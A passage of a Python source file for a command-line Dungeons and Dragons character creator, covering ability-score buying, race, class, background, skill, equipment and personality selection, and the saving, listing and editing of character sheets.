'WIS',\n f'Charisma: {values[\"CHA\"]}': 'CHA',\n f'Confirm values': 'CONFIRM'\n }\n\n show_major_abilities(classe)\n ability = select(\n options=options,\n prompt=f'You have {left_points} points to spend.',\n show_type='key',\n return_type='value',\n clean=False,\n single_item=True,\n go_back=False,\n finish=False,\n )\n\n if ability != 'CONFIRM':\n print('')\n print('Ability score point cost')\n\n point_cost = {\n 8: 0, 9: 1, 10: 2, 11: 3, 12: 4, 13: 5, 14: 7, 15: 9\n }\n scores = ''\n costs = ''\n\n for point, cost in point_cost.items():\n scores += f'{str(point):10s}'\n costs += f'{str(cost):10s}'\n\n print('')\n print(scores)\n print(costs)\n print('')\n\n old_value = values[ability]\n new_value = input(f'Type the new {ability.title()} value: ')\n if not new_value.isnumeric:\n print('\\nValue must be a number.')\n print('Press ENTER and try again.')\n input()\n elif int(new_value) not in point_cost:\n print('\\nValue not found in the table.')\n print('Press ENTER and try again.')\n input()\n else:\n new_value = int(new_value)\n if points_spent \\\n - point_cost[old_value] \\\n + point_cost[new_value] \\\n < 0:\n print('You don\\'t have the points to buy this value.')\n print('Press ENTER and try again.')\n input()\n else:\n points_spent -= point_cost[old_value]\n points_spent += point_cost[new_value]\n values[ability] = new_value\n else:\n confirmed = True\n\n clear_terminal()\n\n return values\n\n\ndef get_existing_abilities_values(abilities, ability_increase):\n values = []\n for ability, value in abilities.values.items():\n if ability in ability_increase:\n values.append(\n value - ability_increase[ability]\n )\n else:\n values.append(value)\n\n return values\n\n\ndef create_abilities(classe, race, abilities=None):\n clear_terminal()\n\n if abilities is None:\n options = [\n 'GENERATE RANDOM VALUES',\n 'USE DEFAULT VALUES',\n 'BUY ABILITIES POINTS'\n ]\n\n answer = select(\n options=options,\n prompt='There are three different ways to '\n 'generate the values of your character',\n single_item=True,\n )\n clear_terminal()\n else:\n options = ['DISTRIBUTE AGAIN', 'USE IT IN THE SAME WAY']\n answer = select(\n options=options,\n prompt='You already generated values for this character. Select'\n 'what you want to do with them now.',\n single_item=True\n )\n clear_terminal()\n\n if answer == 'GO BACK' or answer == 'EXIT':\n return answer\n else:\n if answer == 'BUY ABILITIES POINTS':\n values = buy_points(classe)\n else:\n values = None\n if abilities:\n values = get_existing_abilities_values(\n abilities, race.ability_increase)\n elif answer == 'GENERATE RANDOM VALUES':\n if config['DICE ROLL'] == 'VIRTUAL':\n values = generate_random_values()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n print('In your configurations, you selected '\n 'to roll a physical dice.')\n print('To you abilities, you must roll a 4d6 '\n 'and discard the lesser value.')\n print('Type the sum of the other 3 as a single value.')\n print(\"NOTE: The order doesn't matter just yet.\\n\")\n print('Press ENTER to start typing your values...')\n input()\n\n values = get_typed_dice(\n dice=Dice(number=3, maximum=6),\n times=6\n )\n elif answer == 'USE DEFAULT VALUES':\n values = [15, 14, 13, 12, 10, 8]\n\n if answer != 'USE IT IN THE SAME WAY':\n values = get_abilities_values(values, classe)\n elif answer == 'USE IT IN THE SAME WAY':\n acronyms = ['STR', 'DEX', 'CON', 'INT', 'WIS', 'CHA']\n new_values = {}\n for i in range(6):\n new_values[acronyms[i]] = values[i]\n values = new_values\n\n abilities = Abilities(\n values['STR'],\n values['DEX'],\n values['CON'],\n values['INT'],\n values['WIS'],\n values['CHA']\n )\n\n if 'TWO ABILITIES INCREASE' in race.features:\n abilities_options = index['ABILITIES'].copy()\n abilities_options.pop('CHA')\n\n abilities_to_increase = select(\n options=abilities_options,\n quantity=2,\n prompt=f'As a {race.name}, you can choose the abilities in '\n 'which you has increment in the value.',\n show_type='value',\n return_type='key',\n go_back=False,\n finish=False,\n )\n\n for ability in abilities_to_increase:\n race.ability_increase[ability] = 1\n\n for ability, increase in race.ability_increase.items():\n abilities.increment_ability(ability=ability, value=increase)\n\n return abilities\n\n\ndef choose_or_bought():\n # The rules on equipment have variants, so the user can choose if he/she\n # wants to buy the equipment with a amount of money defined by its class or\n # to select it from the possible options given by the class and background\n answer = select(\n options=['BUY', 'CHOOSE'],\n prompt='You may BUY or CHOOSE your equipment, what would you like?',\n single_item=True,\n )\n\n if answer == 'BUY':\n equipment_bought = True\n elif answer == 'CHOOSE':\n equipment_bought = False\n else:\n equipment_bought = answer\n\n clear_terminal()\n\n return equipment_bought\n\n\ndef unite_proficiency(*proficiency):\n final_list = []\n for a_list in proficiency:\n for element in a_list:\n element_value = find_in_dict(element, index)\n if element_value is not None:\n if isinstance(element_value, list) \\\n or isinstance(element_value, dict) \\\n or isinstance(element_value, tuple):\n new_list = create_simple_list(element_value)\n else:\n new_list = [element_value]\n\n for item in new_list:\n if item.name not in final_list:\n final_list.append(item.name)\n\n return final_list\n\n\ndef race_magic(race_name, level, magical_ability):\n if race_name == 'DARK ELF':\n if 'DANCING LIGHTS' not in magical_ability.cantrips:\n magical_ability.cantrips.append('DANCING LIGHTS')\n\n if level >= 3:\n if 'FAERIC FIRE' not in magical_ability.spells:\n magical_ability.set_spells({1: 'FAERIC FIRE'})\n\n if level >= 5:\n if 'DARKNESS' not in magical_ability.spells:\n magical_ability.set_spells({2: 'DARKNESS'})\n\n if race_name == 'TIEFLING':\n if 'THAUMATURGY' not in magical_ability.cantrips:\n magical_ability.set_cantrips('THAUMATURGY')\n\n if level >= 3:\n if 'HELLISH REBUKE' not in magical_ability.spells:\n magical_ability.set_spells({1: 'HELLISH REBUKE'})\n\n if level >= 5:\n if 'DARKNESS' not in magical_ability.spells:\n magical_ability.set_spells({2: 'DARKNESS'})\n\n\ndef get_alignment():\n # Get alignment\n alignment = select(\n options=index['ALIGNMENTS'],\n prompt='In Dungeons and Dragons, there are 9 possible alignments.',\n single_item=True\n )\n clear_terminal()\n\n return alignment\n\n\ndef select_background():\n # Get background name\n background = select(\n options=index['BACKGROUNDS'] + ['GO BACK', 'EXIT'],\n prompt='In Dungeons and Dragons, there are 13 possible backgrounds.',\n single_item=True\n )\n clear_terminal()\n\n if background == 'ACOLYTE':\n chosen_equipment = [\n book, clothes['COSTUME'], clothes['COMMON'],\n pouch, incense, incense, incense, incense, incense\n ]\n\n background = Acolyte(\n equipment=chosen_equipment,\n equipment_options=[[holy_symbol]],\n )\n\n elif background == 'CHARLATAN':\n background = Charlatan(\n equipment=[clothes['COMMON'], disguise_kit, pouch],\n equipment_options=[[tools_of_the_con]],\n )\n\n elif background == 'CRIMINAL':\n background = Criminal(\n equipment=[crowbar, clothes['COMMON'], pouch],\n variant=get_variant('SPY'),\n )\n\n elif background == 'ENTERTAINER':\n equipments_options = [\n [\n index['EQUIPMENT']['TOOLS']['MUSICAL INSTRUMENT']\n ],\n [\n admirer_favor,\n ]\n ]\n background = Entertainer(\n equipment=[clothes['COSTUME'], pouch, guild_letter],\n equipment_options=equipments_options,\n variant=get_variant('GLADIATOR'),\n )\n\n elif background == 'FOLK HERO':\n chosen_equipment = [\n shovel, iron_pot, clothes['COMMON'],\n pouch, guild_letter, clothes['TRAVELER\\'S']\n ]\n background = FolkHero(\n equipment=chosen_equipment,\n equipment_options=[[artisans_tools]],\n )\n\n elif background == 'GUILD ARTISAN':\n background = GuildArtisan(\n equipment=[clothes['TRAVELER\\'S'], pouch],\n equipment_options=[[artisans_tools]],\n variant=get_variant('GUILD MERCHANT'),\n )\n\n elif background == 'HERMIT':\n chosen_equipment = [\n clothes['COMMON'],\n herbalism_kit,\n map_or_scroll_case,\n winter_blanket,\n ]\n background = Hermit(\n equipment=chosen_equipment,\n )\n\n elif background == 'NOBLE':\n variant = get_variant('KNIGHT')\n chosen_equipment = [\n clothes['FINE'], signet_ring, pouch, scroll_pedigree\n ]\n background = Noble(\n equipment=chosen_equipment,\n variant=variant,\n )\n\n elif background == 'OUTLANDER':\n chosen_equipment = [\n druidic_focus['WOODEN\\'S STAFF'],\n hunting_trap,\n animal_trophy,\n clothes['TRAVELER\\'S'],\n pouch\n ]\n background = Outlander(\n equipment=chosen_equipment,\n )\n\n elif background == 'SAGE':\n chosen_equipment = [\n ink, letter_from_colleague, clothes['COMMON'], pouch\n ]\n background = Sage(equipment=chosen_equipment)\n\n elif background == 'SAILOR':\n background = Sailor(\n equipment=[club, silk_rope, lucky_charm, clothes['COMMON'], pouch],\n variant=get_variant('PIRATE'),\n )\n\n elif background == 'SOLDIER':\n background = Soldier(\n equipment=[insignia_rank, enemy_trophy, clothes['COMMON'], pouch],\n )\n\n elif background == 'URCHIN':\n chosen_equipment = [\n small_knife, city_map, pet_mouse,\n parents_token, clothes['COMMON'], pouch\n ]\n background = Urchin(equipment=chosen_equipment)\n\n return background\n\n\ndef select_new_languages(background, race):\n new_languages = background.languages\n for feature in race.features:\n if feature == 'EXTRA LANGUAGE':\n new_languages += 1\n race.features.remove(feature)\n\n language_options = index['LANGUAGES'].copy()\n for language in race.languages:\n language_options.remove(language)\n\n new_languages = select(\n options=language_options,\n quantity=new_languages,\n prompt='You can choose new languages!'\n )\n clear_terminal()\n\n if new_languages not in ['EXIT', 'GO BACK']:\n languages = race.languages + new_languages\n else:\n languages = new_languages\n\n return languages\n\n\ndef select_proficient_tool(race, classe, background):\n cont = True\n tools = None\n race_tools = None\n class_tools = None\n\n if race.tools_options and cont:\n race_tools = select(\n options=race.tools_options,\n quantity=race.number_tools,\n prompt=f'As a {race.name}, choose the tools in which you are '\n f'proficient with.'\n )\n\n cont = 'EXIT' not in race_tools and 'GO BACK' not in race_tools\n\n if not cont:\n if 'EXIT' in race_tools:\n tools = 'EXIT'\n else:\n tools = 'GO BACK'\n\n if classe.tools_options and cont:\n class_tools = select(\n options=classe.tools_options,\n quantity=classe.number_tools,\n prompt=f'As a {classe.name}, choose the tools in which you are '\n f'proficient with.',\n )\n\n cont = 'EXIT' not in class_tools and 'GO BACK' not in class_tools\n\n if not cont:\n if 'EXIT' in tools:\n tools = 'EXIT'\n else:\n tools = 'GO BACK'\n\n if background.tools_options and cont:\n back_tools = select(\n options=background.tools_options,\n quantity=background.number_tools,\n prompt=f'As a {background.name}, choose the tools in which you are '\n f'proficient with.',\n )\n\n cont = 'EXIT' not in back_tools and 'GO BACK' not in back_tools\n\n if not cont:\n if 'EXIT' in tools:\n tools = 'EXIT'\n else:\n tools = 'GO BACK'\n else:\n tools = {\n 'RACE': race_tools,\n 'CLASS': class_tools,\n 'BACKGROUND': back_tools\n }\n\n return tools\n\n\ndef select_skills(\n race,\n classe,\n background\n):\n cont = True\n all_skills = None\n classe_skills_proficiency = []\n if 'SKILL VERSATILITY' in race.features:\n race.skills_proficiency = []\n\n default_skills = race.skills_proficiency + background.skills\n skill_options = index['SKILLS'].copy()\n skill_options = list(skill_options.keys())\n\n for skill in default_skills:\n if skill in skill_options:\n skill_options.remove(skill)\n else:\n raise Exception('All skills in default skills must be in index!')\n\n if classe.possible_skills:\n skill_options = classe.possible_skills.copy()\n\n for skill in default_skills:\n if skill in skill_options:\n skill_options.remove(skill)\n\n new_skills = select(\n options=skill_options,\n quantity=classe.number_skills,\n prompt=f'As a {classe.name}, you can choose skills to be proficient'\n )\n\n cont = 'EXIT' not in new_skills and 'GO BACK' not in new_skills\n\n if cont:\n for skill in new_skills:\n skill_options.remove(skill)\n\n classe_skills_proficiency += new_skills\n elif 'EXIT' in new_skills:\n all_skills = 'EXIT'\n elif 'GO BACK' in new_skills:\n all_skills = 'GO BACK'\n\n if cont:\n if 'SKILL VERSATILITY' in race.features:\n new_skills = select(\n options=skill_options,\n quantity=2,\n prompt=f'As a {race.name}, you can choose the '\n f'skills that you have proficiency.',\n )\n\n cont = 'EXIT' not in new_skills and 'GO BACK' not in new_skills\n if cont:\n race.skills_proficiency = new_skills\n elif 'EXIT' in new_skills:\n all_skills = 'EXIT'\n elif 'GO BACK' in new_skills:\n all_skills = 'GO BACK'\n\n if cont:\n classe.skills_proficiency = classe_skills_proficiency\n all_skills = race.skills_proficiency \\\n + classe.skills_proficiency \\\n + background.skills\n\n return all_skills\n\n\ndef group_equipment(equipments):\n if 'WEAPONS' not in equipments:\n weapons = []\n armors = []\n trinkets = []\n tools = []\n mounts = []\n gear = []\n total_weight = 0\n\n for equipment in equipments:\n if isinstance(equipment, Weapon):\n weapons.append(equipment)\n elif isinstance(equipment, Armor):\n armors.append(equipment)\n elif isinstance(equipment, Trinket):\n trinkets.append(equipment)\n elif isinstance(equipment, Tool):\n tools.append(equipment)\n elif isinstance(equipment, MountsAndVehicles):\n mounts.append(equipment)\n elif isinstance(equipment, AdventuringGear):\n gear.append(equipment)\n else:\n raise Exception('It appears something went wrong!\\n'\n 'Error: group_equipment')\n\n if equipment.weight is not None:\n total_weight += equipment.weight\n\n equipments = {\n 'ARMORS': armors,\n 'WEAPONS': weapons,\n 'ADVENTURING GEARS': gear,\n 'TOOLS': tools,\n 'MOUNTS AND VEHICLES': mounts,\n 'TRINKETS': trinkets,\n 'WEIGHT': total_weight,\n 'ARMOR EQUIPPED': [],\n 'SHIELD EQUIPPED': False\n }\n\n return equipments\n\n\ndef select_equipment(classe, background):\n equipments = None\n end = False\n while not end:\n equipment_choices = classe.equipment_options \\\n + background.equipment_options\n equipment_bought = choose_or_bought()\n\n if equipment_bought == 'EXIT':\n equipments = 'EXIT'\n elif equipment_bought == 'GO BACK':\n equipments = 'GO BACK'\n\n new_wealth = -1\n if equipment_bought is True:\n equipments, new_wealth = buy_equipment(classe.starting_wealth)\n\n elif equipment_bought is False:\n classe.wealth = -1\n equipments = choose_equipment(equipment_choices)\n\n if equipments != 'GO BACK' \\\n and equipments != 'EXIT' \\\n and equipments is not None:\n equipments = create_simple_list(equipments)\n equipments = group_equipment(equipments)\n\n clear_terminal()\n print('You have chosen:\\n')\n for category, items in equipments.items():\n if isinstance(items, list) and len(items) > 0:\n print_name(category)\n\n items_units = {}\n for item in items:\n try:\n items_units[item] += 1\n except KeyError:\n items_units[item] = 1\n\n for item, units in items_units.items():\n print(f'- {item.name.title()} x{units}')\n print('')\n\n answer = select(\n options=['CONFIRM', 'RESTART'],\n prompt='Select what you want to do with this equipment:',\n single_item=True,\n clean=False,\n )\n\n if answer == 'CONFIRM':\n end = True\n\n if new_wealth != -1:\n classe.wealth = new_wealth\n elif answer in ['GO BACK', 'EXIT']:\n equipments = answer\n\n elif equipments == 'EXIT':\n end = True\n\n elif equipments == 'GO BACK':\n end = True\n\n if end and equipments != 'EXIT' and equipments != 'GO BACK':\n equipments['TRINKETS'] = [random_trinket()]\n\n return equipments\n\n\ndef loop_through_functions(variables, functions_order):\n last_choice = None\n function_number = 0\n\n while function_number < len(functions_order):\n function_info = functions_order[function_number]\n variable_key = function_info[0]\n function = function_info[1]\n parameters_keys = function_info[2]\n asks_user = function_info[3]\n\n parameters = []\n for key in parameters_keys:\n parameters.append(variables[key])\n\n result = function(*parameters)\n\n if last_choice == 'GO BACK' \\\n and ((asks_user == 'SOMETIMES' and result is None)\n or asks_user == 'NEVER'):\n if function_number != 0:\n function_number -= 1\n else:\n return False\n else:\n last_choice = result\n\n if result not in ['GO BACK', 'EXIT']:\n function_number += 1\n variables[variable_key] = result\n elif result is None:\n raise Exception(f'{variable_key} = None.')\n elif result == 'GO BACK':\n if function_number != 0:\n function_number -= 1\n else:\n variables[variable_key] = 'GO BACK'\n return False\n elif result == 'EXIT':\n variables[variable_key] = 'EXIT'\n return False\n\n return True\n\n\ndef select_background_speciality(background, ):\n background_speciality = None\n if background.possible_specialities:\n background_speciality = select(\n options=background.possible_specialities,\n prompt=f'As a {background.name}, you can choose something special.',\n single_item=True\n )\n\n return background_speciality\n\n\ndef select_personality_trait(background):\n personality_trait = select(\n options=background.possible_traits + ['RANDOM', 'WRITE IN'],\n prompt='Choose your psychology trait.',\n single_item=True\n )\n personality_trait = deal_other_options(\n characteristic=personality_trait,\n characteristic_list=background.possible_traits\n )\n\n return personality_trait\n\n\ndef select_ideal(background, alignment):\n possible_ideals = []\n for ideal in background.possible_ideals:\n if ideal[1] in alignment:\n possible_ideals.append(ideal[0])\n\n ideal = select(\n options=possible_ideals + ['RANDOM', 'WRITE IN'],\n prompt='Choose your ideal.',\n single_item=True\n )\n ideal = deal_other_options(\n characteristic=ideal,\n characteristic_list=background.possible_ideals\n )\n\n return ideal\n\n\ndef select_bond(background):\n bond = select(\n options=background.possible_bonds + ['RANDOM', 'WRITE IN'],\n prompt='Choose your bond.',\n single_item=True\n )\n bond = deal_other_options(\n characteristic=bond,\n characteristic_list=background.possible_bonds,\n )\n\n return bond\n\n\ndef select_flaw(background):\n flaw = select(\n options=background.possible_flaws + ['RANDOM', 'WRITE IN'],\n prompt='Choose your flaw.',\n single_item=True\n )\n flaw = deal_other_options(\n characteristic=flaw,\n characteristic_list=background.possible_flaws\n )\n\n return flaw\n\n\ndef select_psychological(alignment, background):\n variables = {\n 'BACKGROUND': background,\n 'ALIGNMENT': alignment,\n 'SPECIALITY': None,\n 'TRAIT': None,\n 'IDEAL': None,\n 'BOND': None,\n 'FLAW': None,\n }\n\n functions_order = [\n ['SPECIALITY', select_background_speciality, ['BACKGROUND'],\n 'SOMETIMES'],\n ['TRAIT', select_personality_trait, ['BACKGROUND'], 'ALWAYS'],\n ['IDEAL', select_ideal, ['BACKGROUND', 'ALIGNMENT'], 'ALWAYS'],\n ['BOND', select_bond, ['BACKGROUND'], 'ALWAYS'],\n ['FLAW', select_flaw, ['BACKGROUND'], 'ALWAYS']\n ]\n\n if loop_through_functions(variables, functions_order):\n background.background_speciality = variables['SPECIALITY']\n background.personality_trait = variables['TRAIT']\n background.ideal = variables['IDEAL']\n background.bond = variables['BOND']\n background.flaw = variables['FLAW']\n else:\n if 'GO BACK' in variables.values():\n return 'GO BACK'\n elif 'EXIT' in variables.values():\n return 'EXIT'\n\n clear_terminal()\n\n return background\n\n\ndef select_race():\n race = select(\n options=index['RACES'],\n prompt='In the world of Dungeons and Dragons, there are 14 races...',\n show_type='key',\n return_type='key',\n single_item=True\n )\n clear_terminal()\n\n # Every different color of a Dragonborn came with different features, so\n # it is treated each as a subrace, having is own race object\n if race == 'DRAGONBORN':\n race = select(\n options=index['DRAGONBORN'],\n prompt='A Dragonborn can be of many colors. Choose your own:',\n show_type='key',\n return_type='value',\n single_item=True\n )\n clear_terminal()\n elif race in ['GO BACK', 'EXIT']:\n pass\n else:\n race = index['RACES'][race]\n\n return race\n\n\ndef select_class():\n # Get Class name\n classe = select(\n options=index['CLASSES'],\n prompt='In Dungeons and Dragons, there are 12 different classes:',\n single_item=True\n )\n clear_terminal()\n\n return classe\n\n\ndef select_background_feature(background):\n feature = background.feature\n if background.feature_options:\n feature = select(\n options=background.feature_options,\n prompt={f'As a {background.name}, you can choose between the '\n f'features'},\n )\n\n return feature\n\n\ndef create_proficiencies(race, classe, background, skills_proficiency):\n # Unite weapons with proficiency\n weapon_proficiency = unite_proficiency(\n race.weapon_proficiency,\n classe.weapon_proficiency\n )\n\n # Unite armors with proficiency\n armor_proficiency = unite_proficiency(\n race.armor_proficiency,\n classe.armor_proficiency\n )\n\n # Unite tools with proficiency\n tools_proficiency = unite_proficiency(\n race.tools_proficiency,\n classe.tools_proficiency,\n background.tools_proficiency\n )\n\n proficiencies = {\n 'VALUE': classe.proficiency,\n 'SAVING THROWS': classe.saving_throw_proficiency,\n 'SKILLS': skills_proficiency,\n 'ARMORS': armor_proficiency,\n 'WEAPONS': weapon_proficiency,\n 'TOOLS': tools_proficiency\n }\n\n return proficiencies\n\n\ndef create_new_character():\n \"\"\"\n Deals with all the info that a new character must have and\n then creates this character with the info provided by the user.\n :return: object of the class Character\n \"\"\"\n\n variables = {\n 'RACE': None,\n 'CLASS': None,\n 'BACKGROUND': None,\n 'LEVEL': None,\n 'ABILITIES': None,\n 'ALIGNMENT': None,\n 'SKILLS PROFICIENCY': None,\n 'LANGUAGES': None,\n 'EQUIPMENTS': None,\n 'PERSONAL INFO': None,\n 'PROFICIENCIES': None,\n 'FEATURE': None,\n 'TOOLS': None\n }\n\n functions_order = [\n ['RACE', select_race, [], 'ALWAYS'],\n ['CLASS', select_class, [], 'ALWAYS'],\n ['BACKGROUND', select_background, [], 'ALWAYS'],\n ['LEVEL', select_level, [], 'ALWAYS'],\n ['ABILITIES', create_abilities,\n ['CLASS', 'RACE', 'ABILITIES'], 'ALWAYS'],\n ['CLASS', create_class, ['CLASS', 'LEVEL', 'ABILITIES'], 'NEVER'],\n ['ALIGNMENT', get_alignment, [], 'ALWAYS'],\n ['FEATURE', select_background_feature, ['BACKGROUND'], 'SOMETIMES'],\n ['SKILLS PROFICIENCY', select_skills,\n ['RACE', 'CLASS', 'BACKGROUND'], 'ALWAYS'],\n ['LANGUAGES', select_new_languages, ['BACKGROUND', 'RACE'], 'ALWAYS'],\n ['TOOLS', select_proficient_tool,\n ['RACE', 'CLASS', 'BACKGROUND'], 'SOMETIMES'],\n ['EQUIPMENTS', select_equipment, ['CLASS', 'BACKGROUND'], 'ALWAYS'],\n ['BACKGROUND', select_psychological,\n ['ALIGNMENT', 'BACKGROUND'], 'ALWAYS'],\n ['PERSONAL INFO', get_personal_info, ['RACE'], 'ALWAYS'],\n ['PROFICIENCIES', create_proficiencies,\n ['RACE', 'CLASS', 'BACKGROUND', 'SKILLS PROFICIENCY'], 'NEVER']\n ]\n\n if loop_through_functions(variables, functions_order):\n variables['BACKGROUND'].feature = variables['FEATURE']\n try:\n variables['RACE'].tools_proficiency = variables['TOOLS']['RACE']\n variables['CLASS'].tools_proficiency = variables['TOOLS']['CLASS']\n variables['BACKGROUND'].tools_proficiency = \\\n variables['TOOLS']['BACKGROUND']\n except (KeyError, TypeError):\n pass\n\n for category in variables['EQUIPMENTS'].keys():\n variables['EQUIPMENTS'][category] += \\\n variables['CLASS'].equipment[category]\n\n character = Character(\n race=variables['RACE'],\n background=variables['BACKGROUND'],\n classe=variables['CLASS'],\n abilities=variables['ABILITIES'],\n alignment=variables['ALIGNMENT'],\n personal_info=variables['PERSONAL INFO'],\n proficiencies=variables['PROFICIENCIES'],\n languages=variables['LANGUAGES'],\n equipments=variables['EQUIPMENTS'],\n )\n\n # Checks if character is Drow and, if so, adds the proper spells\n race_magic(\n race_name=character.general_info['RACE'],\n level=1,\n magical_ability=character.magical_ability\n )\n\n for lvl in range(\n character.general_info['LEVEL'],\n variables['CLASS'].level\n ):\n character.general_info['XP'] = character.xp_by_level[lvl]\n level_up(character)\n\n return character\n else:\n return None\n\n\ndef check_files():\n \"\"\"\n Check if the necessary folder with the saved sheets and config is in order\n :return: the path of the folder of the sheets\n \"\"\"\n global config\n parent = get_parent()\n\n # Check sheets\n sheets_folder = parent.joinpath('Files/Sheets')\n index_file = sheets_folder.joinpath('index.txt')\n\n if not sheets_folder.exists():\n sheets_folder.mkdir(parents=True)\n\n if not index_file.exists():\n sheets_files = get_children(sheets_folder)\n index_file.touch()\n\n for sheet in sheets_files:\n with open(sheet, 'rb') as file:\n character = pickle.load(file)\n\n with open(index_file, 'a') as file:\n file.write(sheet + '\\n')\n file.write(character.personal_info[\"CHARACTER'S NAME\"] + '\\n')\n file.write(character.general_info['RACE'] + '\\n')\n file.write(character.general_info['CLASS'] + '\\n')\n file.write(str(character.general_info['LEVEL']) + '\\n')\n file.write(character.general_info['BACKGROUND'] + '\\n')\n\n # Check configurations\n config_folder = parent.joinpath('Files')\n config_file = config_folder.joinpath('config.txt')\n\n if not config_file.exists():\n config_file.touch()\n\n with open(config_file, 'wb') as new_file:\n pickle.dump(config, new_file)\n\n return parent\n\n\ndef save_sheet(character):\n folder = check_files().joinpath('Files/Sheets')\n path = folder.joinpath(character.personal_info[\"CHARACTER'S NAME\"] + '.txt')\n exists = path.exists()\n\n with open(path, 'wb') as new_file:\n pickle.dump(character, new_file)\n\n if not exists:\n string_path = path.as_posix()\n index_path = folder.joinpath('index.txt')\n with open(index_path, 'a') as index_file:\n index_file.write(string_path + '\\n')\n index_file.write(character.personal_info[\"CHARACTER'S NAME\"] + '\\n')\n index_file.write(character.general_info['RACE'] + '\\n')\n index_file.write(character.general_info['CLASS'] + '\\n')\n index_file.write(str(character.general_info['LEVEL']) + '\\n')\n index_file.write(character.general_info['BACKGROUND'] + '\\n')\n\n\ndef show_sheets():\n \"\"\"\n Prints a formatted table with the main info of the character for the user\n to choose.\n :return: dictionary with the number associated with all the sheets\n \"\"\"\n folder = check_files().joinpath('Files/Sheets')\n sheets_index = folder.joinpath('index.txt')\n sheets_path = {}\n number_sheets = len(get_children(folder)) - 1\n headline = (\n '(##) '\n 'Name '\n 'Race '\n 'Class '\n 'Lv '\n 'Background \\n'\n )\n\n files_info = {}\n with open(sheets_index, 'r') as file_object:\n for _ in range(number_sheets):\n file = file_object.readline()[:-1]\n\n name = file_object.readline()[:-1]\n name = name.strip().split(' ')\n if len(name) > 1: # If the character has more than one name\n name = name[0] + ' ' + name[-1] # Only first and last names\n else:\n name = name[0] # The only name he/she has.\n\n name = f'{name:.24s}' # Max length of 24 characters\n key = name.upper() # To use in the dictionary\n name = f'{name:24s}' # Must occupy 24 characters\n info = ' ' + name + ' '\n\n race = file_object.readline()[:-1]\n race = set_string_size(race, 18)\n info += race + ' '\n\n classe = file_object.readline()[:-1]\n classe = set_string_size(classe, 9)\n info += classe + ' '\n\n level = file_object.readline()[:-1]\n level = set_string_size(level, 2)\n info += level + ' '\n\n background = file_object.readline()[:-1]\n background = set_string_size(background, 13)\n info += background\n\n files_info[info] = key\n sheets_path[key] = file\n files_info[' GO BACK'] = 'GO BACK'\n sheets_path['GO BACK'] = 'GO BACK'\n\n answer = select(\n options=files_info,\n prompt=headline,\n show_type='key',\n return_type='value',\n single_item=True,\n go_back=False,\n finish=False\n )\n\n clear_terminal()\n\n return sheets_path[answer]\n\n\ndef delete_sheet(sheet):\n folder = check_files().joinpath('Files/Sheets')\n index_path = folder.joinpath('index.txt')\n string_path = sheet.as_posix()\n\n with open(index_path, 'r') as index_file:\n lines = index_file.readlines()\n number_sheets = int(len(lines) / 6)\n\n saved_sheets = {}\n with open(index_path, 'r') as index_file:\n for _ in range(number_sheets):\n path_read = index_file.readline()\n saved_sheets[path_read[:-1]] = {\n 'PATH': path_read,\n 'NAME': index_file.readline(),\n 'RACE': index_file.readline(),\n 'CLASS': index_file.readline(),\n 'LEVEL': index_file.readline(),\n 'BACKGROUND': index_file.readline()\n }\n\n saved_sheets.pop(string_path)\n\n with open(index_path, 'w') as index_file:\n for sheet_to_save in saved_sheets.values():\n index_file.write(sheet_to_save['PATH'])\n index_file.write(sheet_to_save['NAME'])\n index_file.write(sheet_to_save['RACE'])\n index_file.write(sheet_to_save['CLASS'])\n index_file.write(sheet_to_save['LEVEL'])\n index_file.write(sheet_to_save['BACKGROUND'])\n\n sheet.unlink()\n\n\ndef edit_character(character):\n possible_to_edit = [\n 'SPELLS',\n 'PERSONAL INFO',\n 'ALIGNMENT',\n ]\n if character.sessions == 0:\n possible_to_edit += [\n 'SKILLS',\n 'RELOCATE ABILITIES',\n 'EQUIPMENT',\n ]\n\n to_edit = None\n while to_edit != 'GO BACK':\n to_edit = select(\n options=possible_to_edit,\n prompt='Select what you want to edit',\n single_item=True,\n finish=False,\n )\n\n clear_terminal()\n\n if to_edit == 'EQUIPMENT':\n end = False\n\n while not end:\n equipment_bought = choose_or_bought()\n\n if equipment_bought not in ['EXIT', 'GO BACK']:\n if equipment_bought:\n new_equipments, new_wealth = buy_equipment(\n character.backup['CLASS'].starting_wealth\n )\n\n if new_equipments != 'GO BACK':\n end = True\n\n if new_equipments is not None:\n character.equipments = new_equipments\n character.wealth = new_wealth\n else:\n new_equipments = choose_equipment(\n character.backup['CLASS'].equipment_options\n )\n\n if new_equipments not in ['GO BACK', 'EXIT']:\n end = True\n character.wealth = character.backup['BACKGROUND'] \\\n .wealth\n character.equipments = new_equipments\n\n elif new_equipments == 'EXIT':\n end = True\n\n character.equipments = group_equipment(character.equipments)\n\n elif equipment_bought == 'EXIT':\n to_edit = 'GO BACK'\n\n elif equipment_bought == 'GO BACK':\n end = True\n\n elif to_edit == 'RELOCATE ABILITIES':\n values = get_existing_abilities_values(\n character.abilities, character.backup['RACE'].ability_increase)\n\n character.abilities.values = get_abilities_values(\n values,\n character.general_info['CLASS']\n )\n\n for ability, increase in \\\n character.backup['RACE'].ability_increase.items():\n character.abilities.increment_ability(ability, increase)\n\n elif to_edit == 'SKILLS':\n new_skills = select_skills(\n race=character.backup['RACE'],\n classe=character.backup['CLASS'],\n background=character.backup['BACKGROUND']\n )\n\n if new_skills != 'GO BACK':\n if new_skills != 'EXIT':\n character.proficiencies['SKILLS'] = new_skills\n else:\n to_edit = 'GO BACK'\n\n elif to_edit == 'SPELLS':\n if character.magical_ability.has_magic:\n end = False\n while not end:\n cont = True\n\n copy_character = copy.deepcopy(character)\n copy_character.magical_ability.set_cantrips([])\n new_cantrips = select_cantrips(copy_character)\n\n if new_cantrips not in ['EXIT', 'GO BACK']:\n character.magical_ability.set_cantrips([])\n character.magical_ability.set_cantrips(new_cantrips)\n else:\n cont = False\n end = True\n\n if new_cantrips == ['EXIT']:\n to_edit = 'GO BACK'\n\n if cont:\n copy_character.magical_ability.set_spells({})\n new_spells = select_spells(copy_character)\n\n if new_spells not in ['EXIT', 'GO BACK']:\n end = True\n character.magical_ability.set_spells({})\n character.magical_ability.set_spells(new_spells)\n elif new_cantrips == ['EXIT']:\n end = True\n to_edit = 'GO BACK'\n else:\n clear_terminal()\n\n print('You are no coward! No need for magic!')\n print('Press ENTER to continue.')\n input()\n\n elif to_edit == 'ALIGNMENT':\n option = select(\n options=index['ALIGNMENTS'],\n prompt='In Dungeons and Dragons, '\n 'there are 9 possible alignments.',\n single_item=True,\n )\n\n if option != 'GO BACK':\n if option != 'EXIT':\n character.general_info['ALIGNMENT'] = option\n else:\n to_edit = 'GO BACK'\n\n elif to_edit == 'PERSONAL INFO':\n options = [\n 'PLAYER 